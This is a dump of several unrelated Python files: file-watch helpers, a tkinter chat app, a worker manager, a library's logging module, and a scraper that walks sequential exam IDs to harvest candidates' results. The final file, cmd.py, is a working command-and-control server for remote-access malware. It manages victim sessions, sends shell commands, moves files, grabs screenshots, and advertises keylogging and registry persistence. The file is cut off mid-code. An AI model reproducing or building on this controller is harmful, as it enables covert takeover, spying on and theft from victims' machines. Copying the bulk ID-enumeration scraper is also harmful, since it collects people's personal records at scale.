Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback(fullpath)
def create_file_if_missing(path, permission=0o660, contents=None):
dirname = os.path.dirname(path)
if dirname and not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError as e:
if e.errno != errno.EEXIST:
raise
try:
open(path)
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
_log.debug('missing file %s', path)
_log.info('creating file %s', path)
fd = os.open(path, os.O_CREAT | os.O_WRONLY, permission)
try:
if contents:
os.write(fd, contents)
finally:
os.close(fd)
def fix_sqlite3_datetime(sql=None):
"""Primarily for fixing the base historian cache on certain versions
of python.
    Registers a new datetime converter that uses dateutil parse. This should
    better resolve #216, #174, and #91 without the goofy workarounds that
    change data.
Optional sql argument is for testing only.
"""
if sql is None:
import sqlite3 as sql
sql.register_adapter(datetime, format_timestamp)
sql.register_converter("timestamp", parse_timestamp_string)
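# Hedged usage sketch: the registered converter only takes effect for
# connections opened with detect_types, e.g.
#
#   import sqlite3
#   fix_sqlite3_datetime()
#   conn = sqlite3.connect(":memory:", detect_types=sqlite3.PARSE_DECLTYPES)
#   # columns declared as "timestamp" are now parsed via parse_timestamp_string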
|
ChatterBox.py | #Main
import tkinter as tk
import tkinter.messagebox
import threading
from time import sleep
import socket
class ChatterBox:
def __init__(self):
self.port = 51540
self.root = tk.Tk()
self.q = None
self.root.geometry("460x250")
self.root.title("ChatterBox! Messenger")
self.RemoteCallsign = "Remote"
self.MyCallsign = "Me"
self.render()
self.historylock = threading.Lock()
self.sendinglock = threading.Lock()
self.root.protocol("WM_DELETE_WINDOW", self.shutdown)
self.shuttingdown = False
self.killserver = False
self.connected = False
self.launchServer()
self.historyboxqueue = []
self.typingStatusToSet = "Waiting for connect..."
        self.root.after(200,self.updateHistory) #Evil polling, but tk is not thread-safe by default.
self.root.after(600,self.updateNotifyTyping)
self.root.after(150,self.updateTyping)
self.root.after(100,self.cleanEmptySend)
self.oldText = ""
def launchServer(self):
self.serverThread = threading.Thread(target=self.server)
self.serverThread.start()
def launchClient(self):
self.clientThread = threading.Thread(target=self.client)
self.clientThread.start()
def centerWindow(self, win):
win.update_idletasks()
width = win.winfo_width()
height = win.winfo_height()
x = self.root.winfo_rootx() + 20
y = self.root.winfo_rooty() + 20
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
def shutdown(self):
self.shuttingdown = True
if self.q:
if self.connected:
self.sendMessage("_DISCONNECT")
self.connected = False
sleep(1.4) #Wait for Disconnect
self.q.close()
self.root.destroy()
def updateTyping(self):
self.statusLabel.configure(text=self.typingStatusToSet)
self.root.after(150,self.updateTyping)
def updateNotifyTyping(self):
        curText = self.sendbox.get("1.0",tk.END).strip()
if curText != self.oldText:
self.sendMessage("_ISTYPING")
elif curText:
self.sendMessage("_ISENTERED")
else:
self.sendMessage("_NOTYPING")
self.oldText = curText
self.root.after(600,self.updateNotifyTyping)
def updateHistory(self):
self.historylock.acquire()
self.historybox.config(state=tk.NORMAL)
pos = self.scrollbar.get()[1]
for item in self.historyboxqueue:
self.historybox.insert(tk.END,item)
if pos == 1:
self.historybox.yview(tk.END)
self.historyboxqueue = []
self.historybox.config(state=tk.DISABLED)
self.historylock.release()
self.root.after(200,self.updateHistory)
def submitToHistory(self,message):
self.historylock.acquire()
self.historyboxqueue.append(message + "\n")
self.historylock.release()
def sendMessage(self,message):
self.sendinglock.acquire()
message = bytes(message,"UTF-8")
if self.connected:
sentChars = 0
while message:
j = self.q.send(message)
if j < 0:
self.sendinglock.release()
return False #Error
sentChars += j
message = message[j:]
self.sendinglock.release()
return True
else:
self.sendinglock.release()
return False
def server(self):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',self.port))
s.listen(1)
s.setblocking(False)
self.submitToHistory("Server thread is listening on port " +
str(self.port))
while not self.shuttingdown and not self.killserver:
try:
q,v = s.accept()
            except OSError:
q = None
sleep(2)
if q:
self.q = q
self.submitToHistory("Got connection! " + str(v[0]))
self.connected = True
break
if not self.shuttingdown and not self.killserver:
self.sendMessage("This is ChatterBox server.")
self.sendMessage("You are now free to move about the cabin.")
self.launchClient()
return
def prepsetIsTyping(self):
self.typingStatusToSet = "Remote is typing..."
def prepsetIsEntered(self):
self.typingStatusToSet = "Remote has entered text."
def prepsetNoTyping(self):
self.typingStatusToSet = "No remote activity."
def client(self):
self.submitToHistory("Client thread initialized.")
while not self.shuttingdown:
try:
msg = self.q.recv(1024).decode('utf-8')
if "_ISTYPING" in msg:
self.prepsetIsTyping()
elif "_ISENTERED" in msg:
self.prepsetIsEntered()
elif "_NOTYPING" in msg:
self.prepsetNoTyping()
elif "_DISCONNECT" in msg:
self.submitToHistory("Remote does proper disconnect")
self.connected = False
msg = msg.replace("_ISTYPING",'',100)
msg = msg.replace("_ISENTERED",'',100)
msg = msg.replace("_NOTYPING",'',100)
if "_NEWCALLSIGN" in msg:
old = self.RemoteCallsign
self.RemoteCallsign = msg.replace("_NEWCALLSIGN",'',100)
msg = (old + " changed their name to " +
self.RemoteCallsign)
leadingAlready = True
else:
leadingAlready = False
msg = msg.replace("_DISCONNECT",'',100)
if msg and not leadingAlready:
self.submitToHistory(self.RemoteCallsign + ": " + msg)
if msg and leadingAlready:
self.submitToHistory(msg)
sleep(0.2)
            except Exception:
sleep(0.2)
if not self.connected:
self.launchServer()
return
def mainloop(self):
self.root.mainloop()
def doAbout(self):
tk.messagebox.showinfo(title="About ChatterBox",
message="ChatterBox is an alpha chat client written "
"in pure Python, using tkinter for graphics.\n\n"
"Press Connect to start a new connection, or "
"wait until someone connects to you. \n\n"
"You can also change your callsign as seen by "
"your connected partner. \n\n"
"This program was written by henfredemars to "
"learn about networking and the unreliable nature "
"of data transfer over the internet.")
def doSetCallsign(self):
localroot = tk.Toplevel(self.root)
localroot.title("Set Callsign")
localroot.focus_set()
tk.Label(localroot,text="Callsign:").pack(side='left')
e = tk.Entry(localroot)
e.pack(side='left')
okayButton = tk.Button(localroot,text="Configure",
command=lambda:self.acceptCallsign(
localroot,e.get()))
okayButton.pack(side='left')
self.centerWindow(localroot)
def acceptCallsign(self,localroot,text):
if text:
self.MyCallsign = text
self.submitToHistory("I changed my name to " + text)
self.sendMessage("_NEWCALLSIGN" + text)
localroot.destroy()
def doConnect(self):
localroot = tk.Toplevel(self.root)
localroot.title("Connect")
localroot.focus_set()
tk.Label(localroot,text="IP Address:Port").pack(side='left')
e = tk.Entry(localroot)
e.pack(side='left')
okayButton = tk.Button(localroot,text="Configure",
command=lambda:self.acceptConnect(localroot,
e.get()))
okayButton.pack(side='left')
self.centerWindow(localroot)
def acceptConnect(self,localroot,addrstring):
self.submitToHistory("Configured for address " + addrstring)
localroot.destroy()
f = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
tl = addrstring.split(":")
f.connect((tl[0],int(tl[1])))
self.q = f
self.connected = True
except:
self.submitToHistory("Could not connect to address.")
return
self.killserver = True
self.submitToHistory("Server thread shutting down...")
self.launchClient()
def cleanEmptySend(self):
        if not self.sendbox.get("1.0",tk.END).strip():
            self.sendbox.delete("1.0",tk.END)
self.root.after(100,self.cleanEmptySend)
def doSend(self, event=None):
        text = self.sendbox.get("1.0",tk.END).strip()
if not text:
return
        self.sendbox.delete("1.0",tk.END)
self.submitToHistory("Me: " + text)
if not self.sendMessage(text):
self.submitToHistory("Send failed.")
def render(self):
mainframe = tk.Frame(self.root)
mainframe.pack(expand=True,fill='both')
connect = tk.Button(mainframe,text="Connect",command=self.doConnect)
connect.grid(row=0,column=3,sticky='nsew')
newcall = tk.Button(mainframe,text="Set Callsign",
command=self.doSetCallsign)
newcall.grid(row=1,column=3,sticky='nsew')
about = tk.Button(mainframe,text="About",command=self.doAbout)
about.grid(row=2,column=3,sticky='nsew')
send = tk.Button(mainframe,text="Send!",command=self.doSend)
send.grid(row=4,column=3,sticky='nsew')
self.sendbox = tk.Text(mainframe,height=4,width=20)
self.sendbox.bind('<Return>',self.doSend)
self.sendbox.grid(row=4,column=0,columnspan=3,sticky='nsew')
mainframe.columnconfigure(0,weight=1)
for i in range(0,3):
mainframe.rowconfigure(i,weight=1)
minframe = tk.Frame(mainframe)
self.historybox = tk.Text(minframe,height=6,width=20,state=tk.DISABLED)
self.historybox.grid(row=0,column=0,sticky='nsew')
minframe.rowconfigure(0,weight=1)
minframe.columnconfigure(0,weight=1)
self.scrollbar = tk.Scrollbar(minframe,
command=self.historybox.yview)
self.scrollbar.grid(row=0,column=1,sticky='ns')
minframe.grid(row=0,column=0,columnspan=3,rowspan=3,
sticky='nsew')
self.historybox.config(yscrollcommand=self.scrollbar.set)
self.statusLabel = tk.Label(mainframe,text="Waiting for connect...")
self.statusLabel.grid(row=3,columnspan=3,sticky='w')
if __name__=="__main__":
print("I'm main!")
app = ChatterBox()
app.mainloop()
|
core.py | """
Work in progress worker management for lynxfall
Note: This will only handle startup/shutdown and other tasks, not micromanaging individual workers.
Stats and error handling are a maybe and will be implemented after core functionality
Worker-specific tasks are another maybe, unless done via redis PUBSUB or similar, since rabbit is round-robin and not every worker gets every task
Workdragon will have a redis pubsub protocol for external management
Support for windows/mac is not planned as of right now.
"""
import os
import subprocess
import threading
class Worker():
"""Represents a worker"""
def __init__(self, worker_num, process, thread):
self.process = process
self.worker_num = worker_num
self.thread = thread
class WorkDragon():
"""WorkDragon main class"""
def __init__(self, launcher):
self.workers = []
self.launcher = launcher
self.log_workers = True
self.workers_to_log = []
def worker_log(self, wnum):
"""Returns worker log function"""
def _log(proc):
for line in iter(proc.stdout.readline, b''):
line = line.decode('utf-8')
if int(wnum) in self.workers_to_log and self.log_workers:
print(f"{wnum}: {line}", end='')
return _log
def new_worker(self):
"""Creates a new worker"""
wnum = len(self.workers) + 1
proc = subprocess.Popen(['python3', '-u', self.launcher],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=dict(os.environ, LYNXFALL_WORKER_NUM=str(wnum))
)
t = threading.Thread(target=self.worker_log(wnum), args=(proc,))
self.workers_to_log.append(wnum)
t.start()
self.workers.append(Worker(wnum, proc, t))
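# Hedged usage sketch ("launcher.py" is a placeholder script name):
#
#   dragon = WorkDragon("launcher.py")
#   dragon.new_worker()   # spawns `python3 -u launcher.py` with LYNXFALL_WORKER_NUM=1
#   dragon.new_worker()   # a second worker gets LYNXFALL_WORKER_NUM=2
#   dragon.workers_to_log.remove(2)   # stop echoing worker 2's output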
|
logging.py | """
Tango makes heavy use of the :mod:`logging` module from the standard library to convey information to users.
When you're writing your own :class:`~tango.step.Step` implementations we encourage you to also use standard
Python logging as opposed to :func:`print` or other functions that write directly to ``stdout`` or ``stderr``.
This is easy enough since each :class:`~tango.step.Step` class already comes with its own logger:
:attr:`Step.logger <tango.step.Step.logger>`.
When using the `Tango CLI <./commands.html>`_ you can set the log level in several different ways:
1. Through a Tango `global settings <./commands.html#global-settings>`_ file.
2. With the environment variable ``TANGO_LOG_LEVEL``.
3. Or with the ``--log-level`` command-line option.
In some cases (like when running on `Beaker <https://beaker.org>`_) you may also want
to enable `"file friendly logging" <#tango.common.logging.FILE_FRIENDLY_LOGGING>`_.
Configuring logging in your own CLI
-----------------------------------
If you're writing your own CLI that uses tango, you can utilize the :func:`initialize_logging()`
function to easily configure logging properly.
For example,
.. testcode::
    import logging
    from tango.common.logging import initialize_logging, teardown_logging
initialize_logging(log_level="info")
logger = logging.getLogger()
logger.info("Running script!")
teardown_logging()
.. testoutput::
:options: +ELLIPSIS
[... INFO root] Running script!
If you want to have logs written to a file, you can use the :func:`file_handler` context manager.
Logging from worker processes or threads
----------------------------------------
If you have steps or other functions that spawn workers, and you want to enable logging within
those workers, you can call the :func:`initialize_worker_logging()` function to configure
logging within each worker. This assumes that you've called :func:`initialize_logging()` from the
main process (the tango CLI does this for you).
For example,
.. testcode::
import logging
import multiprocessing as mp
from tango import Step
from tango.common.logging import initialize_worker_logging
@Step.register("multiprocessing_step_example")
class MultiprocessingStep(Step):
def run(self, num_proc: int = 2) -> bool: # type: ignore
workers = []
for i in range(num_proc):
worker = mp.Process(target=_worker_function, args=(i,))
workers.append(worker)
worker.start()
for worker in workers:
worker.join()
return True
def _worker_function(worker_id: int):
initialize_worker_logging(worker_rank=worker_id)
logger = logging.getLogger(MultiprocessingStep.__name__)
logger.info("Hello from worker %d!", worker_id)
"""
import logging
import logging.handlers
import os
import pickle
import socketserver
import struct
import sys
import threading
from contextlib import contextmanager
from typing import ContextManager, Generator, Optional
import click
from .aliases import EnvVarNames, PathOrStr
from .exceptions import SigTermReceived
from .util import _parse_bool, _parse_optional_int
FILE_FRIENDLY_LOGGING: bool = _parse_bool(
os.environ.get(EnvVarNames.FILE_FRIENDLY_LOGGING_ENV_VAR.value, False)
)
"""
If this flag is set to ``True``, we remove special styling characters from log messages,
add newlines to :class:`~tango.common.tqdm.Tqdm` output even on an interactive terminal, and we slow
down :class:`~tango.common.tqdm.Tqdm`'s output to only once every 10 seconds.
.. attention::
Unfortunately this won't affect ``tqdm`` output from other libraries that don't use
Tango's :class:`~tango.common.tqdm.Tqdm` wrapper.
By default, it is set to ``False``. It can be changed by setting the corresponding environment
variable (``FILE_FRIENDLY_LOGGING``) or field in a :class:`~tango.__main__.TangoGlobalSettings`
file (``file_friendly_logging``) to "true" or "false",
or from the command line with the ``--file-friendly-logging`` flag.
For example,
.. code-block::
$ tango --file-friendly-logging run ...
"""
TANGO_LOG_LEVEL: Optional[str] = os.environ.get(EnvVarNames.LOG_LEVEL_ENV_VAR.value, None)
"""
The log level to use globally. The value can be set from the corresponding environment variable
(``TANGO_LOG_LEVEL``) or field in a :class:`~tango.__main__.TangoGlobalSettings` file (``log_level``),
or from the command line with the ``--log-level`` option.
Possible values are "debug", "info", "warning", or "error" (not case sensitive).
For example,
.. code-block::
$ tango --log-level info run ...
.. note::
This does not affect the :data:`~tango.common.logging.click_logger`
or logs from :class:`~tango.common.Tqdm` progress bars.
"""
# Click logger disabled by default in case nobody calls initialize_logging().
TANGO_CLICK_LOGGER_ENABLED: bool = _parse_bool(
os.environ.get(EnvVarNames.CLICK_LOGGER_ENABLED_ENV_VAR.value, False)
)
class TangoLogger(logging.Logger):
"""
A custom subclass of :class:`logging.Logger` that does some additional cleaning
of messages when :attr:`FILE_FRIENDLY_LOGGING` is on.
This is the default logger class used when :func:`initialize_logging()` is called.
"""
def __init__(self, name):
super().__init__(name)
self._seen_msgs = set()
def log(self, level, msg, *args, **kwargs):
msg = msg if not FILE_FRIENDLY_LOGGING else click.unstyle(msg)
super().log(level, msg, *args, **kwargs)
def debug_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.debug(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def info_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.info(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def warning_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.warning(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def error_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.error(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def critical_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.critical(msg, *args, **kwargs)
self._seen_msgs.add(msg)
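    # Hedged usage sketch: with TangoLogger installed as the logger class (see
    # logging.setLoggerClass(TangoLogger) below), the *_once variants suppress
    # repeats of an identical message:
    #
    #   logger = logging.getLogger("my_step")   # "my_step" is illustrative
    #   logger.warning_once("slow path taken")  # logged
    #   logger.warning_once("slow path taken")  # silently skipped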
class TangoFormatter(logging.Formatter):
def format(self, record: logging.LogRecord):
out = super().format(record)
if FILE_FRIENDLY_LOGGING:
out = click.unstyle(out)
return out
class WarningFilter(logging.Filter):
"""
Filters out everything that is at the WARNING level or higher. This is meant to be used
with a stdout handler when a stderr handler is also configured. That way WARNING and ERROR
messages aren't duplicated.
"""
def filter(self, record):
return record.levelno < logging.WARNING
class WorkerLogFilter(logging.Filter):
def __init__(self, rank=-1):
super().__init__()
self._rank = rank
def filter(self, record):
if self._rank != -1:
record.msg = f"[rank {self._rank}] {record.msg}"
return True
class LogRecordStreamHandler(socketserver.StreamRequestHandler):
"""Handler for a streaming logging request.
This basically logs the record using whatever logging policy is
configured locally.
Taken from
`the logging cookbook <https://docs.python.org/3.7/howto/logging-cookbook.html>`_.
"""
def handle(self):
"""
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
"""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
def unPickle(self, data):
return pickle.loads(data)
def handleLogRecord(self, record):
name = record.name
logger = logging.getLogger(name)
# N.B. EVERY record gets logged. This is because Logger.handle
# is normally called AFTER logger-level filtering. If you want
# to do filtering, do it at the client end to save wasting
# cycles and network bandwidth!
logger.handle(record)
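    # Note: the stdlib's logging.handlers.SocketHandler emits exactly this wire
    # format (a 4-byte big-endian length prefix followed by a pickled dict of
    # the record), so a worker can ship records to this receiver with e.g.:
    #
    #   import logging, logging.handlers
    #   handler = logging.handlers.SocketHandler("localhost", 9020)  # port is
    #   # illustrative; LogRecordSocketReceiver binds an OS-assigned port by default
    #   logging.getLogger().addHandler(handler)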
class LogRecordSocketReceiver(socketserver.ThreadingTCPServer):
"""
Simple TCP socket-based logging receiver.
Taken from
`the logging cookbook <https://docs.python.org/3.7/howto/logging-cookbook.html>`_.
"""
allow_reuse_address = True
def __init__(self, host: str, port: int = 0):
super().__init__((host, port), LogRecordStreamHandler)
self.abort = False
self.timeout = 0.2
def serve_until_stopped(self):
import select
while not self.abort:
rd, _, _ = select.select([self.socket.fileno()], [], [], self.timeout)
if rd:
self.handle_request()
_LOGGING_HOST: str = os.environ.get(EnvVarNames.LOGGING_HOST_ENV_VAR.value, "localhost")
_LOGGING_PORT: Optional[int] = _parse_optional_int(
os.environ.get(EnvVarNames.LOGGING_PORT_ENV_VAR.value, None)
)
_LOGGING_SERVER: Optional[LogRecordSocketReceiver] = None
_LOGGING_SERVER_THREAD: Optional[threading.Thread] = None
logging.setLoggerClass(TangoLogger)
click_logger = logging.getLogger("click")
"""
A logger that logs messages through
`click <https://click.palletsprojects.com/>`_'s
``click.echo()`` function.
This provides a convenient way for command-line apps to log pretty, styled messages.
"""
click_logger.propagate = False
class ClickLoggerHandler(logging.Handler):
def emit(self, record: logging.LogRecord) -> None:
if FILE_FRIENDLY_LOGGING:
click.echo(click.unstyle(record.getMessage()))
else:
click.echo(record.getMessage())
click_logger.addHandler(ClickLoggerHandler())
click_logger.disabled = not TANGO_CLICK_LOGGER_ENABLED
def get_formatter() -> TangoFormatter:
log_format = "[%(process)d %(asctime)s %(levelname)s %(name)s] %(message)s"
return TangoFormatter(log_format)
def initialize_logging(
*,
log_level: Optional[str] = None,
enable_click_logs: Optional[bool] = None,
file_friendly_logging: Optional[bool] = None,
):
"""
Initialize logging, which includes setting the global log level, format, and configuring
handlers.
.. tip::
This should be called as early on in your script as possible.
.. tip::
        You should also call :func:`teardown_logging()` at the end of your script.
.. tip::
For worker threads/processes, use :func:`initialize_worker_logging()` instead.
:param log_level:
Can be one of "debug", "info", "warning", "error". Defaults to the value
of :data:`TANGO_LOG_LEVEL`, if set, or "error".
:param enable_click_logs:
Set to ``True`` to enable messages from the :data:`click_logger`.
:param file_friendly_logging:
Enable or disable file friendly logging. Defaults to the value of :data:`FILE_FRIENDLY_LOGGING`.
"""
import multiprocessing as mp
is_main_process: bool
if hasattr(mp, "parent_process"): # python 3.8 or greater
is_main_process = mp.parent_process() is None # type: ignore
else:
is_main_process = mp.current_process().name == "MainProcess"
_initialize_logging(
log_level=log_level,
enable_click_logs=enable_click_logs,
file_friendly_logging=file_friendly_logging,
main_process=is_main_process,
)
def initialize_worker_logging(worker_rank: Optional[int] = None):
"""
Initialize logging in a worker thread/process.
:param worker_rank:
The rank/ID of the worker.
"""
return _initialize_logging(worker_rank=worker_rank, main_process=False)
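# A minimal sketch of the intended main/worker flow (the ``worker`` function
# and rank value are illustrative, not part of this module):
#
#     import multiprocessing as mp
#
#     def worker(rank):
#         initialize_worker_logging(worker_rank=rank)
#         logging.getLogger(__name__).info("hello from a worker")
#
#     initialize_logging(log_level="info")  # main process: starts the log server
#     p = mp.Process(target=worker, args=(0,))
#     p.start()
#     p.join()
#     teardown_logging()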
def _initialize_logging(
*,
log_level: Optional[str] = None,
enable_click_logs: Optional[bool] = None,
file_friendly_logging: Optional[bool] = None,
worker_rank: Optional[int] = None,
main_process: bool = True,
):
global FILE_FRIENDLY_LOGGING, TANGO_LOG_LEVEL, TANGO_CLICK_LOGGER_ENABLED
global _LOGGING_HOST, _LOGGING_PORT, _LOGGING_SERVER, _LOGGING_SERVER_THREAD
if log_level is None:
log_level = TANGO_LOG_LEVEL
if log_level is None:
log_level = "error"
if file_friendly_logging is None:
file_friendly_logging = FILE_FRIENDLY_LOGGING
if enable_click_logs is None:
enable_click_logs = TANGO_CLICK_LOGGER_ENABLED
level = logging._nameToLevel[log_level.upper()]
# Update global flags and corresponding environment variables, if necessary,
# so that child processes can read the environment variables to determine the right
# settings.
TANGO_LOG_LEVEL = log_level
os.environ[EnvVarNames.LOG_LEVEL_ENV_VAR.value] = log_level
if file_friendly_logging is not None:
FILE_FRIENDLY_LOGGING = file_friendly_logging
os.environ[EnvVarNames.FILE_FRIENDLY_LOGGING_ENV_VAR.value] = str(
file_friendly_logging
).lower()
if enable_click_logs is not None:
TANGO_CLICK_LOGGER_ENABLED = enable_click_logs
os.environ[EnvVarNames.CLICK_LOGGER_ENABLED_ENV_VAR.value] = str(enable_click_logs).lower()
from .tqdm import logger as tqdm_logger
# Handle special cases for specific loggers:
# These loggers emit too many messages, so we tell them to be quiet unless they have something
# important to say.
for loud_logger in {"filelock", "sqlitedict"}:
logging.getLogger(loud_logger).setLevel(max(level, logging.WARNING))
# We always want to see all click messages if we're running from the command line, and none otherwise.
click_logger.setLevel(logging.DEBUG)
click_logger.disabled = not enable_click_logs
# We also want to enable the tqdm logger so that the progress bar lines end up in the log file.
tqdm_logger.setLevel(logging.DEBUG)
root_logger = logging.getLogger()
root_logger.setLevel(level)
root_logger.handlers.clear()
if main_process:
formatter = get_formatter()
# Create stdout and stderr handlers so that we can route DEBUG and INFO
# messages to stdout, and WARNING and ERROR messages to stderr.
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(level)
stdout_handler.addFilter(WarningFilter())
stdout_handler.setFormatter(formatter)
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setLevel(logging.WARNING)
stderr_handler.setFormatter(formatter)
root_logger.addHandler(stdout_handler)
root_logger.addHandler(stderr_handler)
# Main process: set formatter and handlers, initialize logging socket and server.
# Set up logging socket to emit log records from worker processes/threads.
# Inspired by:
# https://docs.python.org/3.7/howto/logging-cookbook.html#sending-and-receiving-logging-events-across-a-network
_LOGGING_SERVER = LogRecordSocketReceiver(_LOGGING_HOST, 0)
_LOGGING_PORT = _LOGGING_SERVER.server_address[1]
os.environ[EnvVarNames.LOGGING_PORT_ENV_VAR.value] = str(_LOGGING_PORT)
_LOGGING_SERVER_THREAD = threading.Thread(
target=_LOGGING_SERVER.serve_until_stopped, daemon=True
)
_LOGGING_SERVER_THREAD.start()
else:
# Child process: set handler and level, no need to set formatting since only raw log records
# will be sent to the logging socket.
if _LOGGING_PORT is None:
raise ValueError(
"missing logging socket configuration, "
"did you forget to call 'initialize_logging()' from the main process?"
)
socket_handler = logging.handlers.SocketHandler(_LOGGING_HOST, _LOGGING_PORT)
if worker_rank is not None:
socket_handler.addFilter(WorkerLogFilter(worker_rank))
for logger in (root_logger, click_logger, tqdm_logger):
logger.handlers.clear()
logger.addHandler(socket_handler)
# Write uncaught exceptions to the logs.
def excepthook(exctype, value, traceback):
# For interruptions, call the original exception handler.
if issubclass(exctype, (KeyboardInterrupt, SigTermReceived)):
sys.__excepthook__(exctype, value, traceback)
return
root_logger.critical("Uncaught exception", exc_info=(exctype, value, traceback))
sys.excepthook = excepthook
# Ensure warnings issued by the 'warnings' module will be redirected to the logging system.
logging.captureWarnings(True)
def teardown_logging():
"""
    Clean up any logging fixtures created by :func:`initialize_logging()`. Should
be called at the end of your script.
"""
global _LOGGING_HOST, _LOGGING_PORT, _LOGGING_SERVER, _LOGGING_SERVER_THREAD
if _LOGGING_SERVER is not None:
_LOGGING_SERVER.abort = True
if _LOGGING_SERVER_THREAD is not None:
_LOGGING_SERVER_THREAD.join()
_LOGGING_SERVER_THREAD = None
    _LOGGING_SERVER = None
@contextmanager
def insert_handler(handler: logging.Handler) -> Generator[None, None, None]:
"""
A context manager that can be used to route logs to a specific handler temporarily.
"""
root_logger = logging.getLogger()
from .tqdm import logger as tqdm_logger
formatter = get_formatter()
handler.setFormatter(formatter)
for logger in (root_logger, click_logger, tqdm_logger):
logger.addHandler(handler)
try:
yield None
finally:
for logger in (root_logger, click_logger, tqdm_logger):
logger.removeHandler(handler)
def file_handler(filepath: PathOrStr) -> ContextManager[None]:
"""
A context manager that can be used to route logs to a file by adding a
:class:`logging.FileHandler` to the root logger's handlers.
For example,
.. code-block::
from tango.common.logging import initialize_logging, file_handler, teardown_logging
initialize_logging(log_level="info")
logger = logging.getLogger()
logger.info("Hi!")
with file_handler("log.out"):
logger.info("This message should also go into 'log.out'")
teardown_logging()
"""
handler = logging.FileHandler(str(filepath))
return insert_handler(handler)
|
MainTest.py | import bs4, requests, os, xlsxwriter, time, multiprocessing
start_time = time.time()
def generateID(n):
    # Pad the candidate number with leading zeros to the 8-digit ID format.
    return str(n).zfill(8)
workbook = xlsxwriter.Workbook('PhoDiemData1.xlsx')
worksheet = workbook.add_worksheet()
row = 2
col = 0
def abc(n):
link = 'https://news.zing.vn/tra-cuu-diem-thi-thpt-2017-ket-qua.html?text=' + generateID(n)
res = requests.get(link)
soup = bs4.BeautifulSoup(res.text, "html.parser")
participantInfo = soup.select('.table td')
return participantInfo
if __name__ == '__main__':
    # Fetch each page once, in parallel; write cells in the main process only,
    # since an xlsxwriter workbook is not safe to share across processes.
    with multiprocessing.Pool() as pool:
        for participantInfo in pool.map(abc, range(25004950, 25005000)):
            if participantInfo:
                worksheet.write(row, col, participantInfo[0].text)
                worksheet.write(row, col + 1, participantInfo[1].text)
                worksheet.write(row, col + 2, participantInfo[2].text)
                worksheet.write(row, col + 3, participantInfo[3].text)
                worksheet.write(row, col + 4, participantInfo[5].text)
                row += 1
    workbook.close()
    print("--- %s seconds ---" % (time.time() - start_time)) |
cmd.py | import socket
import termcolor
import json
import os
import threading
def reliable_recv(target):
data = ''
while True:
try:
data = data + target.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def reliable_send(target, data):
jsondata = json.dumps(data)
target.send(jsondata.encode())
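# A sketch of the framing these helpers assume (the command string is
# illustrative): the sender emits one JSON document, and reliable_recv()
# keeps appending 1024-byte chunks until json.loads() succeeds:
#
#     reliable_send(target, 'whoami')   # sends b'"whoami"'
#     output = reliable_recv(target)    # buffers until valid JSON arrives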
def upload_file(target, file_name):
    # Read the whole file and send it; 'with' ensures the handle is closed.
    with open(file_name, 'rb') as f:
        target.send(f.read())
def download_file(target, file_name):
    with open(file_name, 'wb') as f:
        target.settimeout(1)
        chunk = target.recv(1024)
        while chunk:
            f.write(chunk)
            try:
                chunk = target.recv(1024)
            except socket.timeout:
                break
        target.settimeout(None)
def target_communication(target, ip):
count = 0
while True:
command = input('* Shell~%s: ' % str(ip))
reliable_send(target, command)
if command == 'quit':
break
elif command == 'background':
break
elif command == 'clear':
os.system('clear')
elif command[:3] == 'cd ':
pass
elif command[:6] == 'upload':
upload_file(target, command[7:])
elif command[:8] == 'download':
download_file(target, command[9:])
elif command[:10] == 'screenshot':
            with open('screenshot%d' % count, 'wb') as f:
                target.settimeout(3)
                chunk = target.recv(1024)
                while chunk:
                    f.write(chunk)
                    try:
                        chunk = target.recv(1024)
                    except socket.timeout:
                        break
                target.settimeout(None)
count += 1
elif command == 'help':
print(termcolor.colored('''\n
quit --> Quit Session With The Target
clear --> Clear The Screen
cd *Directory Name* --> Changes Directory On Target System
upload *file name* --> Upload File To The target Machine
download *file name* --> Download File From Target Machine
keylog_start --> Start The Keylogger
keylog_dump --> Print Keystrokes That The Target Inputted
keylog_stop --> Stop And Self Destruct Keylogger File
persistence *RegName* *fileName* --> Create Persistence In Registry''', 'green'))
else:
result = reliable_recv(target)
print(result)
def accept_connections():
while True:
if stop_flag:
break
sock.settimeout(1)
try:
target, ip = sock.accept()
targets.append(target)
ips.append(ip)
print(termcolor.colored(str(ip) + ' has connected!', 'green'))
        except OSError:
            # accept() timed out, or the socket was closed during shutdown.
            pass
targets = []
ips = []
stop_flag = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('192.168.1.9', 5555))
sock.listen(5)
t1 = threading.Thread(target=accept_connections)
t1.start()
print(termcolor.colored('[+] Waiting For The Incoming Connections ...', 'green'))
while True:
command = input('[**] Command & Control Center: ')
if command == 'targets':
counter = 0
for ip in ips:
print('Session ' + str(counter) + ' --- ' + str(ip))
counter += 1
elif command == 'clear':
os.system('clear')
elif command[:7] == 'session':
try:
num = int(command[8:])
tarnum = targets[num]
tarip = ips[num]
target_communication(tarnum, tarip)
        except (ValueError, IndexError):
